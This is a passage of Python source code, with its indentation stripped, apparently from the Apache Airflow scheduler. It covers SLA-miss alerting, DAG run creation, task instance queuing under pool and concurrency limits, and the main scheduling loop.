if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
if run_duration is None:
self.run_duration = conf.getint('scheduler',
'run_duration')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super(SchedulerJob, self).is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def manage_slas(self, dag, session=None):
"""
Find all tasks that have SLAs defined, and send alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
# This is a temporary fix for 1.10.4 release.
# Background: AIRFLOW-4297
# TODO: refactor manage_slas() to handle related issues.
if dag.normalized_schedule_interval is None:
self.log.info("SLA check for DAGs with schedule_interval 'None'/'@once' are "
"skipped in 1.10.4, due to related refactoring going on.")
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n</code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}</code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, basestring):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in six.iteritems(dagbag.import_errors):
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for DAGs that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now or isinstance(dag.schedule_interval, timedelta):
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_runs.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns is
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from dag_id to # of task instances in the given states and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
num_tasks_in_executor = 0
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
if task_instance.pool_slots > open_slots:
self.log.info("Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance, task_instance.pool_slots, open_slots, pool)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
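# This TI fits: reserve its pool slots and bump the concurrency counters so the
# remaining candidates in this loop see the updated usage.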
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these don't expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = timezone.utcnow()
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contain all of the task_instances' DAGs
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instances whose state was changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
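# Reducer passed to helpers.reduce_in_chunks below: queue one chunk of executable TIs
# and accumulate how many had their state changed.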
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# TI.try_number returns the raw try_number + 1 while the TI is not
# running, so subtract 1 here to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs back to the scheduled state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance.queued_dttm = None
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: list[airflow.models.DAG]
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
if conf.getboolean('core', 'CHECK_SLAS', fallback=True):
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s.%s (execution_date=%s) went missing from the database", dag_id, task_id, execution_date)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says it's {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Running execute loop for %s seconds", self.run_duration)
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
type(self)._create_dag_file_processor,
processor_timeout,
self.dag_ids,
pickle_dags,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(file_path, zombies, dag_ids, pickle_dags):
"""
Creates DagFileProcessorProcess instance.
"""
return DagFileProcessor(file_path,
pickle_dags,
dag_ids,
zombies)
def _get_simple_dags(self):
return self.processor_agent.harvest_simple_dags()
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while (timezone.utcnow() - execute_start_time).total_seconds() < \
self.run_duration or self.run_duration < 0:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self._get_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag):
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
